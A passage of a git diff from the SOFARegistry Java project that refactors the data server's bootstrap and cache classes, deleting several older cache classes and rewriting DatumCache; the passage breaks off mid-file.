b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/bootstrap/DataServerInitializer.java index 3c1fe5b41..34175c7a3 100644 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/bootstrap/DataServerInitializer.java +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/bootstrap/DataServerInitializer.java @@ -16,50 +16,57 @@ */ package com.alipay.sofa.registry.server.data.bootstrap; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.context.SmartLifecycle; /** - * * @author qian.lqlq * @version $Id: DataServerInitializer.java, v 0.1 2018年01月04日 11:08 qian.lqlq Exp $ */ public class DataServerInitializer implements SmartLifecycle { + private static final Logger LOGGER = LoggerFactory.getLogger(DataServerInitializer.class); - @Autowired - private DataServerBootstrap dataServerBootstrap; + @Autowired private DataServerBootstrap dataServerBootstrap; - private volatile boolean isRunning; + private volatile boolean isRunning; - @Override - public boolean isAutoStartup() { - return true; - } + @Override + public boolean isAutoStartup() { + return true; + } - @Override - public void stop(Runnable runnable) { - runnable.run(); - this.isRunning = false; - } + @Override + public void stop(Runnable runnable) { + runnable.run(); + this.isRunning = false; + } - @Override - public void start() { - dataServerBootstrap.start(); - this.isRunning = true; + @Override + public void start() { + try { + dataServerBootstrap.start(); + this.isRunning = true; + } catch (Throwable ex) { + this.isRunning = false; + LOGGER.error("Could not initalized Data server", ex); + System.exit(-1); } + } - @Override - public void stop() { - this.isRunning = false; - } + @Override + public void stop() { + this.isRunning = false; + } - @Override - public boolean isRunning() { - return this.isRunning; - } + @Override + public boolean isRunning() { + return this.isRunning; + } - @Override - public int getPhase() { - return 0; - } -} \ No newline at end of file + @Override + public int getPhase() { + return 0; + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/bootstrap/EnableDataServer.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/bootstrap/EnableDataServer.java index d42b85691..ff5419f51 100644 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/bootstrap/EnableDataServer.java +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/bootstrap/EnableDataServer.java @@ -16,16 +16,14 @@ */ package com.alipay.sofa.registry.server.data.bootstrap; -import org.springframework.context.annotation.Import; - import java.lang.annotation.Documented; import java.lang.annotation.ElementType; import java.lang.annotation.Retention; import java.lang.annotation.RetentionPolicy; import java.lang.annotation.Target; +import org.springframework.context.annotation.Import; /** - * * @author shangyu.wh * @version $Id: EnableSessionServer.java, v 0.1 2017-11-14 11:38 synex Exp $ */ @@ -33,5 +31,4 @@ @Retention(RetentionPolicy.RUNTIME) @Documented @Import(DataServerBeanConfiguration.class) -public @interface EnableDataServer { -} \ No newline at end of file +public @interface EnableDataServer {} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/BackupTriad.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/BackupTriad.java deleted file mode 100644 index 35c49566f..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/BackupTriad.java +++ /dev/null @@ -1,133 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.cache; - -import com.alipay.sofa.registry.common.model.metaserver.DataNode; -import com.alipay.sofa.registry.consistency.hash.ConsistentHash; -import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; - -import java.util.ArrayList; -import java.util.HashSet; -import java.util.List; -import java.util.Set; - -/** - * - * @author qian.lqlq - * @version $Id: BackupTriad.java, v 0.1 2018-04-28 23:41 qian.lqlq Exp $ - */ -public class BackupTriad { - /** dataInfoId */ - private String dataInfoId; - - /** - * calculate current dataServer list Consistent hash to get dataInfoId belong node and backup node list - * @see ConsistentHash#ConsistentHash(int, java.util.Collection) - * @see com.alipay.sofa.registry.consistency.hash.ConsistentHash#getNUniqueNodesFor(java.lang.Object, int) - */ - private List triad; - - private Set ipSetOfNode = new HashSet<>(); - - /** - * constructor - * @param dataInfoId - * @param triad - */ - public BackupTriad(String dataInfoId, List triad) { - this.dataInfoId = dataInfoId; - this.triad = triad; - for (DataNode node : triad) { - ipSetOfNode.add(node.getIp()); - } - } - - /** - * check contains current node - * @return - */ - public boolean containsSelf() { - return !ipSetOfNode.isEmpty() && ipSetOfNode.contains(DataServerConfig.IP); - } - - /** - * get new joined nodes - * - * @param newTriad - * @return - */ - public List getNewJoined(List newTriad, Set notWorking) { - List list = new ArrayList<>(); - for (DataNode node : newTriad) { - String ip = node.getIp(); - if (!ipSetOfNode.contains(ip) || notWorking.contains(ip)) { - list.add(node); - } - } - return list; - } - - /** - * Getter method for property dataInfoId. - * - * @return property value of dataInfoId - */ - public String getDataInfoId() { - return dataInfoId; - } - - /** - * Setter method for property dataInfoId. - * - * @param dataInfoId value to be assigned to property dataInfoId - */ - public void setDataInfoId(String dataInfoId) { - this.dataInfoId = dataInfoId; - } - - /** - * Getter method for property triad. - * - * @return property value of triad - */ - public List getTriad() { - return triad; - } - - /** - * Setter method for property triad. - * - * @param triad value to be assigned to property triad - */ - public void setTriad(List triad) { - this.triad = triad; - Set ipSetOfNode = new HashSet<>(); - for (DataNode node : triad) { - ipSetOfNode.add(node.getIp()); - } - this.ipSetOfNode = ipSetOfNode; - } - - @Override - public String toString() { - final StringBuilder sb = new StringBuilder("BackupTriad{"); - sb.append("dataInfoId='").append(dataInfoId).append('\''); - sb.append(", ipSetOfNode=").append(ipSetOfNode); - sb.append('}'); - return sb.toString(); - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/CacheDigestTask.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/CacheDigestTask.java deleted file mode 100644 index 5b09ddb31..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/CacheDigestTask.java +++ /dev/null @@ -1,95 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.cache; - -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.common.model.store.Publisher; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.util.NamedThreadFactory; -import org.springframework.util.CollectionUtils; - -import java.util.Map; -import java.util.Map.Entry; -import java.util.concurrent.ScheduledExecutorService; -import java.util.concurrent.ScheduledThreadPoolExecutor; -import java.util.concurrent.TimeUnit; - -/** - * - * @author qian.lqlq - * @version $Id: CacheDigestTask.java, v 0.1 2018-04-27 17:40 qian.lqlq Exp $ - */ -public class CacheDigestTask { - - private static final Logger LOGGER = LoggerFactory.getLogger(CacheDigestTask.class); - - /** - * - */ - public void start() { - ScheduledExecutorService executor = new ScheduledThreadPoolExecutor(1, new NamedThreadFactory("CacheDigestTask")); - executor.scheduleAtFixedRate(() -> { - try { - Map> allMap = DatumCache.getAll(); - if (!allMap.isEmpty()) { - for (Entry> dataCenterEntry : allMap.entrySet()) { - String dataCenter = dataCenterEntry.getKey(); - Map datumMap = dataCenterEntry.getValue(); - LOGGER.info("[CacheDigestTask] size of datum in {} is {}", - dataCenter, datumMap.size()); - for (Entry dataInfoEntry : datumMap.entrySet()) { - String dataInfoId = dataInfoEntry.getKey(); - Datum data = dataInfoEntry.getValue(); - Map pubMap = data.getPubMap(); - StringBuilder pubStr = new StringBuilder(); - if (!CollectionUtils.isEmpty(pubMap)) { - for (Publisher publisher : pubMap.values()) { - pubStr.append(logPublisher(publisher)).append(";"); - } - } - LOGGER.info( - "[Datum] dataInfoId={}, version={}, dataCenter={}, publishers=[{}]", - dataInfoId, data.getVersion(), dataCenter, pubStr.toString()); - } - int pubCount = datumMap.values().stream().map(Datum::getPubMap) - .filter(map -> map != null && !map.isEmpty()).mapToInt(Map::size).sum(); - LOGGER.info("[CacheDigestTask] size of publisher in {} is {}", - dataCenter, pubCount); - } - } else { - LOGGER.info("[CacheDigestTask] datum cache is empty"); - } - - } catch (Throwable t) { - LOGGER.error("[CacheDigestTask] cache digest error", t); - } - }, 30, 300, TimeUnit.SECONDS); - } - - private String logPublisher(Publisher publisher) { - if (publisher != null) { - URL url = publisher.getSourceAddress(); - String urlStr = url != null ? url.getAddressString() : "null"; - return String.format("dataInfoId=%s, version=%s, host=%s, registerId=%s", - publisher.getDataInfoId(), publisher.getVersion(), urlStr, - publisher.getRegisterId()); - } - return ""; - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/CleanContinues.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/CleanContinues.java new file mode 100644 index 000000000..fd4d7ee67 --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/CleanContinues.java @@ -0,0 +1,34 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.cache; + +public interface CleanContinues { + CleanContinues ALWAYS = + new CleanContinues() { + @Override + public boolean continues() { + return true; + } + + @Override + public void onClean(int num) {} + }; + + boolean continues(); + + void onClean(int num); +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/DataServerCache.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/DataServerCache.java deleted file mode 100644 index 163d633ff..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/DataServerCache.java +++ /dev/null @@ -1,375 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.cache; - -import com.alipay.sofa.registry.common.model.metaserver.DataNode; -import com.alipay.sofa.registry.consistency.hash.ConsistentHash; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; -import com.alipay.sofa.registry.server.data.node.DataNodeStatus; -import com.alipay.sofa.registry.server.data.util.LocalServerStatusEnum; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.Collection; -import java.util.HashMap; -import java.util.HashSet; -import java.util.List; -import java.util.Map; -import java.util.Map.Entry; -import java.util.Set; -import java.util.concurrent.ConcurrentHashMap; -import java.util.concurrent.atomic.AtomicBoolean; -import java.util.concurrent.atomic.AtomicLong; - -/** - * cache of dataservers - * - * @author qian.lqlq - * @version $Id: DataServerCache.java, v 0.1 2018-05-05 17:00 qian.lqlq Exp $ - */ -public class DataServerCache { - - private static final Logger LOGGER = LoggerFactory - .getLogger(DataServerCache.class); - - @Autowired - private DataNodeStatus dataNodeStatus; - - @Autowired - private DataServerConfig dataServerConfig; - - private volatile DataServerChangeItem dataServerChangeItem = new DataServerChangeItem(); - - private volatile DataServerChangeItem newDataServerChangeItem = new DataServerChangeItem(); - - private final AtomicBoolean HAS_NOTIFY_ALL = new AtomicBoolean( - false); - - private AtomicLong curVersion = new AtomicLong( - -1L); - - /** version -> Map(serverIp, serverStatus) */ - private Map> nodeStatusMap = new ConcurrentHashMap<>(); - - /** - * compare new infos and cached infos, and return these changed - * - * @param newItem - * @return changedMap(datacenter, serverIp) - */ - public Map> compareAndSet(DataServerChangeItem newItem) { - synchronized (DataServerCache.class) { - // versionMap: datacenter -> version - Map newVersionMap = newItem.getVersionMap(); - //check current run newItem same - Map currentNewVersionMap = newDataServerChangeItem.getVersionMap(); - if (!currentNewVersionMap.isEmpty()) { - AtomicBoolean isTheSame = new AtomicBoolean(true); - if (newVersionMap.size() == currentNewVersionMap.size()) { - for (Entry entry : newVersionMap.entrySet()) { - String dataCenter = entry.getKey(); - Long version = entry.getValue(); - Long currentVersion = currentNewVersionMap.get(dataCenter); - if (currentVersion != null && version != null) { - if (currentVersion.longValue() != version.longValue()) { - isTheSame.set(false); - break; - } - } else { - if (currentVersion != null || version != null) { - isTheSame.set(false); - break; - } - } - } - } else { - isTheSame.set(false); - } - if (isTheSame.get()) { - LOGGER - .info( - "current process map has a same version as change map,this change will be ignored!process version={},get version={}", - currentNewVersionMap, newVersionMap); - return new HashMap<>(); - } - } - - Map> changedMap = new HashMap<>(); - Map oldVersionMap = new HashMap<>(dataServerChangeItem.getVersionMap()); - Map> newServerMap = newItem.getServerMap(); - - for (Entry dataCenterEntry : newVersionMap.entrySet()) { - String dataCenter = dataCenterEntry.getKey(); - if (oldVersionMap.containsKey(dataCenter)) { - Long oldVersion = oldVersionMap.remove(dataCenter); - if (oldVersion >= dataCenterEntry.getValue()) { - continue; - } - } - changedMap.put(dataCenter, newServerMap.get(dataCenter).keySet()); - } - if (!oldVersionMap.isEmpty()) { - for (String dataCenter : oldVersionMap.keySet()) { - changedMap.put(dataCenter, new HashSet<>()); - } - } - if (changedMap.containsKey(dataServerConfig.getLocalDataCenter())) { - init(newVersionMap.get(dataServerConfig.getLocalDataCenter())); - } - if (!changedMap.isEmpty()) { - LOGGER.info("old server map = {}", dataServerChangeItem.getServerMap()); - LOGGER.info("new server map = {}", newServerMap); - LOGGER.info("new server version map = {}", newVersionMap); - LOGGER.info("status map = {}", nodeStatusMap); - LOGGER.info("changed map = {}", changedMap); - newDataServerChangeItem = newItem; - } - return changedMap; - } - } - - private void init(long version) { - if (curVersion.compareAndSet(-1, version)) { - Map map = new ConcurrentHashMap<>(); - map.put(DataServerConfig.IP, LocalServerStatusEnum.INITIAL); - nodeStatusMap.put(version, map); - } else { - //first get dataChange after other data send init message - Map map = nodeStatusMap.get(curVersion.get()); - if (map != null) { - map.putIfAbsent(DataServerConfig.IP, LocalServerStatusEnum.INITIAL); - } - } - } - - private void addStatus(long version, String ip, LocalServerStatusEnum localServerStatusEnum) { - long lastVersion = curVersion.getAndSet(version); - Map map = nodeStatusMap.remove(lastVersion); - if (map != null) { - map.put(ip, localServerStatusEnum); - nodeStatusMap.put(curVersion.get(), map); - } else { - Map newMap = new ConcurrentHashMap<>(); - map = nodeStatusMap.putIfAbsent(curVersion.get(), newMap); - if (map == null) { - map = newMap; - } - map.put(ip, localServerStatusEnum); - } - } - - private void resetStatusMapToWorking() { - Map map = nodeStatusMap.get(curVersion.get()); - if (map != null) { - map.clear(); - map.put(DataServerConfig.IP, LocalServerStatusEnum.WORKING); - } - LOGGER.info("nodeStatusMap has been reset!Result {}", nodeStatusMap); - } - - public boolean removeNotifyNewStatusNode(String ip) { - synchronized (DataServerCache.class) { - Map map = nodeStatusMap.get(curVersion.get()); - if (map != null) { - LocalServerStatusEnum statusEnum = map.get(ip); - if (statusEnum != null && statusEnum == LocalServerStatusEnum.INITIAL) { - if (map.remove(ip) != null) { - LOGGER.info("nodeStatusMap remove init status node {}!Result {}", ip, - nodeStatusMap); - } - } - } - return false; - } - } - - public void synced(long version, String ip) { - synchronized (DataServerCache.class) { - if (version >= curVersion.get()) { - addStatus(version, ip, LocalServerStatusEnum.WORKING); - LOGGER.info("synced working = {}, version={},send ip={}", nodeStatusMap, version, - ip); - updateDataServerStatus(); - } - } - } - - public void addNotWorkingServer(long version, String ip) { - synchronized (DataServerCache.class) { - if (version >= curVersion.get()) { - addStatus(version, ip, LocalServerStatusEnum.INITIAL); - LOGGER.info("add not working = {}, version={},send ip={}", nodeStatusMap, version, - ip); - if (dataNodeStatus.getStatus() != LocalServerStatusEnum.WORKING) { - updateDataServerStatus(); - } - } - } - } - - private void updateDataServerStatus() { - if (dataNodeStatus.getStatus() != LocalServerStatusEnum.WORKING) { - - Long newVersion = newDataServerChangeItem.getVersionMap().get( - dataServerConfig.getLocalDataCenter()); - - if (newVersion == null) { - LOGGER.info("no node change receive from meta about current dataCenter!"); - return; - } - - if (newVersion != curVersion.get()) { - LOGGER.info("version not match,current {} push {}", curVersion.longValue(), - newVersion); - return; - } - - Map map = nodeStatusMap.get(curVersion.get()); - if (map != null) { - Set ips = map.keySet(); - if (!ips.containsAll(newDataServerChangeItem.getServerMap() - .get(dataServerConfig.getLocalDataCenter()).keySet())) { - LOGGER.info( - "nodeStatusMap not contains all push list,nodeStatusMap {} push {}", - nodeStatusMap, - newDataServerChangeItem.getServerMap() - .get(dataServerConfig.getLocalDataCenter()).keySet()); - return; - } - } else { - LOGGER.info("nodeStatusMap has not got other data node status!"); - return; - } - - if (!HAS_NOTIFY_ALL.get()) { - LOGGER.info("Has not notify all!"); - return; - } - - dataNodeStatus.setStatus(LocalServerStatusEnum.WORKING); - - //after working status,must clean this map,because calculate backupTriad need add not working node,see LocalDataServerChangeEventHandler getToBeSyncMap - resetStatusMapToWorking(); - } - } - - public Long getCurVersion() { - return curVersion.get(); - } - - public void notifiedAll() { - if (HAS_NOTIFY_ALL.compareAndSet(false, true)) { - updateDataServerStatus(); - } - } - - public void checkAndUpdateStatus(long version) { - synchronized (DataServerCache.class) { - if (version == curVersion.get()) { - updateDataServerStatus(); - } - } - } - - public Set getNotWorking() { - synchronized (DataServerCache.class) { - Set ret = new HashSet<>(); - Map map = nodeStatusMap.get(curVersion.get()); - if (map != null) { - map.forEach((ip, status) -> { - if (status != LocalServerStatusEnum.WORKING) { - ret.add(ip); - } - }); - } - return ret; - } - } - - public void updateItem(Map localDataNodes, Long version, String dataCenter) { - synchronized (DataServerCache.class) { - Long oldVersion = dataServerChangeItem.getVersionMap().get(dataCenter); - Map oldList = dataServerChangeItem.getServerMap().get(dataCenter); - Set oldIps = oldList == null ? new HashSet<>() : oldList.keySet(); - Set newIps = localDataNodes == null ? new HashSet<>() : localDataNodes.keySet(); - LOGGER.warn("Update DataCenter={} Item version from={} to={},nodeMap from={} to={}", - dataCenter, oldVersion, version, oldIps, newIps); - dataServerChangeItem.getServerMap().put(dataCenter, localDataNodes); - dataServerChangeItem.getVersionMap().put(dataCenter, version); - - } - } - - public Map getDataServers(String dataCenter) { - return getDataServers(dataCenter, dataServerChangeItem); - } - - public Map getDataServers(String dataCenter, - DataServerChangeItem dataServerChangeItem) { - return doGetDataServers(dataCenter, dataServerChangeItem); - } - - public Map getNewDataServerMap(String dataCenter) { - return doGetDataServers(dataCenter, newDataServerChangeItem); - } - - private Map doGetDataServers(String dataCenter, - DataServerChangeItem dataServerChangeItem) { - synchronized (DataServerCache.class) { - Map> dataserverMap = dataServerChangeItem.getServerMap(); - if (dataserverMap.containsKey(dataCenter)) { - return dataserverMap.get(dataCenter); - } else { - return new HashMap<>(); - } - } - } - - public Long getDataCenterNewVersion(String dataCenter) { - synchronized (DataServerCache.class) { - Map versionMap = newDataServerChangeItem.getVersionMap(); - if (versionMap.containsKey(dataCenter)) { - return versionMap.get(dataCenter); - } else { - return null; - } - } - } - - public BackupTriad calculateOldBackupTriad(String dataInfoId, String dataCenter, - DataServerConfig dataServerBootstrapConfig) { - Map> dataServerMap = dataServerChangeItem.getServerMap(); - Map dataNodeMap = dataServerMap.get(dataCenter); - - if (dataNodeMap != null && !dataNodeMap.isEmpty()) { - - Collection dataServerNodes = dataNodeMap.values(); - - ConsistentHash consistentHash = new ConsistentHash<>( - dataServerBootstrapConfig.getNumberOfReplicas(), dataServerNodes); - - List list = consistentHash.getNUniqueNodesFor(dataInfoId, - dataServerBootstrapConfig.getStoreNodes()); - - return new BackupTriad(dataInfoId, list); - } else { - LOGGER.warn("Calculate Old BackupTriad,old dataServer list is empty!"); - return null; - } - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/DataServerChangeItem.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/DataServerChangeItem.java deleted file mode 100644 index e65f46c74..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/DataServerChangeItem.java +++ /dev/null @@ -1,79 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.cache; - -import com.alipay.sofa.registry.common.model.metaserver.DataNode; - -import java.util.HashMap; -import java.util.Map; - -/** - * change info of datacenters - * - * @author qian.lqlq - * @version $Id: DataServerChangeItem.java, v 0.1 2018-05-05 17:37 qian.lqlq Exp $ - */ -public class DataServerChangeItem { - - /** datacenter -> Map */ - private Map> serverMap; - - /** datacenter -> version */ - private Map versionMap; - - /** - * constructor - */ - public DataServerChangeItem() { - this(new HashMap<>(), new HashMap<>()); - } - - /** - * constructor - * @param serverMap - * @param versionMap - */ - public DataServerChangeItem(Map> serverMap, - Map versionMap) { - this.serverMap = serverMap; - this.versionMap = versionMap; - } - - /** - * Getter method for property serverMap. - * - * @return property value of serverMap - */ - public Map> getServerMap() { - return serverMap; - } - - /** - * Getter method for property versionMap. - * - * @return property value of versionMap - */ - public Map getVersionMap() { - return versionMap; - } - - @Override - public String toString() { - return "DataServerChangeItem{" + "serverMap=" + serverMap + ", versionMap=" + versionMap - + '}'; - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/DatumCache.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/DatumCache.java index 6b17f7702..31d9341a3 100644 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/DatumCache.java +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/DatumCache.java @@ -16,294 +16,91 @@ */ package com.alipay.sofa.registry.server.data.cache; +import com.alipay.sofa.registry.common.model.ConnectId; import com.alipay.sofa.registry.common.model.dataserver.Datum; +import com.alipay.sofa.registry.common.model.dataserver.DatumVersion; import com.alipay.sofa.registry.common.model.store.Publisher; -import com.alipay.sofa.registry.server.data.change.DataChangeTypeEnum; -import org.springframework.util.StringUtils; - -import java.util.HashMap; -import java.util.Iterator; -import java.util.Map; -import java.util.Map.Entry; -import java.util.Set; -import java.util.concurrent.ConcurrentHashMap; +import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; +import com.google.common.annotations.VisibleForTesting; +import java.util.*; +import org.springframework.beans.factory.annotation.Autowired; /** * cache of datum, providing query function to the upper module * + * @author kezhu.wukz * @author qian.lqlq * @version $Id: DatumCache.java, v 0.1 2017-12-06 20:50 qian.lqlq Exp $ */ public class DatumCache { - - public static final long ERROR_DATUM_VERSION = -2L; - - /** - * row: dataCenter - * column: dataInfoId - * value: datum - */ - private static final Map> DATUM_MAP = new ConcurrentHashMap<>(); - - /** - * row: ip:port - * column: registerId - * value: publisher - */ - private static final Map> CLIENT_PUB_MAP = new ConcurrentHashMap<>(); - - /** - * get datum by specific dataCenter and dataInfoId - * - * @param dataCenter - * @param dataInfoId - * @return - */ - public static Datum get(String dataCenter, String dataInfoId) { - if (DATUM_MAP.containsKey(dataCenter)) { - Map map = DATUM_MAP.get(dataCenter); - if (map.containsKey(dataInfoId)) { - return map.get(dataInfoId); - } - } - return null; - } - - /** - * get datum of all datercenters by dataInfoId - * - * @param dataInfoId - * @return - */ - public static Map get(String dataInfoId) { - Map datumMap = new HashMap<>(); - DATUM_MAP.forEach((dataCenter, datums) -> { - if (datums.containsKey(dataInfoId)) { - datumMap.put(dataCenter, datums.get(dataInfoId)); - } - }); - - return datumMap; - } - - /** - * get datum group by dataCenter - * - * @param dataCenter - * @param dataInfoId - * @return - */ - public static Map getDatumGroupByDataCenter(String dataCenter, String dataInfoId) { - Map map = new HashMap<>(); - if (StringUtils.isEmpty(dataCenter)) { - map = DatumCache.get(dataInfoId); - } else { - Datum datum = DatumCache.get(dataCenter, dataInfoId); - if (datum != null) { - map.put(dataCenter, datum); - } - } - return map; - } - - /** - * get all datum - * - * @return - */ - public static Map> getAll() { - return DATUM_MAP; - } - - /** - * - * - * @param host - * @return - */ - public static Map getByHost(String host) { - return CLIENT_PUB_MAP.getOrDefault(host, null); - } - - /** - * put datum into cache - * - * @param changeType - * @param datum - * @return the last version before datum changed, if datum is not exist, return null - */ - public static MergeResult putDatum(DataChangeTypeEnum changeType, Datum datum) { - MergeResult mergeResult; - String dataCenter = datum.getDataCenter(); - String dataInfoId = datum.getDataInfoId(); - Map map = DATUM_MAP.get(dataCenter); - if (map == null) { - map = new ConcurrentHashMap<>(); - Map ret = DATUM_MAP.putIfAbsent(dataCenter, map); - if (ret != null) { - map = ret; - } - } - - //first put UnPublisher datum(dataId group instanceId is null),can not add to cache - if (datum.getDataId() == null && map.get(dataInfoId) == null) { - mergeResult = new MergeResult(ERROR_DATUM_VERSION, false); - return mergeResult; - } - - Datum ret = map.putIfAbsent(dataInfoId, datum); - if (ret == null) { - Set> entries = datum.getPubMap().entrySet(); - Iterator> iterator = entries.iterator(); - while (iterator.hasNext()) { - Entry entry = iterator.next(); - Publisher publisher = entry.getValue(); - if (!(publisher instanceof UnPublisher)) { - String registerId = publisher.getRegisterId(); - Map clientRegisterMap = new ConcurrentHashMap<>(); - clientRegisterMap.put(registerId, publisher); - Map retMap = CLIENT_PUB_MAP.putIfAbsent(publisher - .getSourceAddress().getAddressString(), clientRegisterMap); - if (retMap != null) { - retMap.putAll(clientRegisterMap); - } - } else { - //first put to cache,UnPublisher data must remove,not so got error pub data exist - iterator.remove(); - } - } - mergeResult = new MergeResult(null, true); - } else { - if (changeType == DataChangeTypeEnum.MERGE) { - mergeResult = mergeDatum(datum); - } else { - Long lastVersion = coverDatum(datum); - mergeResult = new MergeResult(lastVersion, true); - } - } - return mergeResult; - } - - /** - * remove datum ant contains all pub data,and clean all the client map reference - * @param dataCenter - * @param dataInfoId - * @return - */ - public static boolean cleanDatum(String dataCenter, String dataInfoId) { - - Map datumMap = DATUM_MAP.get(dataCenter); - if (datumMap != null) { - Datum cacheDatum = datumMap.remove(dataInfoId); - if (cacheDatum != null) { - Map cachePubMap = cacheDatum.getPubMap(); - - for (Entry cachePubEntry : cachePubMap.entrySet()) { - String registerId = cachePubEntry.getKey(); - Publisher cachePub = cachePubEntry.getValue(); - //remove from cache - if (cachePub != null) { - cachePubMap.remove(registerId); - CLIENT_PUB_MAP.get(cachePub.getSourceAddress().getAddressString()).remove( - registerId); - } - } - return true; - } - } - return false; - } - - /** - * merge datum in cache - * - * @param datum - * @return - */ - private static MergeResult mergeDatum(Datum datum) { - boolean isChanged = false; - Datum cacheDatum = DATUM_MAP.get(datum.getDataCenter()).get(datum.getDataInfoId()); - Map cachePubMap = cacheDatum.getPubMap(); - Map pubMap = datum.getPubMap(); - for (Entry pubEntry : pubMap.entrySet()) { - String registerId = pubEntry.getKey(); - Publisher pub = pubEntry.getValue(); - Publisher cachePub = cachePubMap.get(registerId); - if (pub instanceof UnPublisher) { - //remove from cache - if (cachePub != null - && pub.getRegisterTimestamp() > cachePub.getRegisterTimestamp()) { - cachePubMap.remove(registerId); - CLIENT_PUB_MAP.get(cachePub.getSourceAddress().getAddressString()).remove( - registerId); - isChanged = true; - } - } else { - String pubAddr = pub.getSourceAddress().getAddressString(); - long version = pub.getVersion(); - long cacheVersion = cachePub == null ? 0L : cachePub.getVersion(); - String cachePubAddr = cachePub == null ? "" : cachePub.getSourceAddress() - .getAddressString(); - if (cacheVersion <= version) { - cachePubMap.put(registerId, pub); - if (cacheVersion < version || !pubAddr.equals(cachePubAddr)) { - // if version of both pub and cachePub are not equal, or sourceAddress of both are not equal, update - // eg: sessionserver crash, client reconnect to other sessionserver, sourceAddress changed, version not changed - // eg: client restart, sourceAddress and version are both changed - if (CLIENT_PUB_MAP.containsKey(cachePubAddr)) { - CLIENT_PUB_MAP.get(cachePubAddr).remove(registerId); - } - if 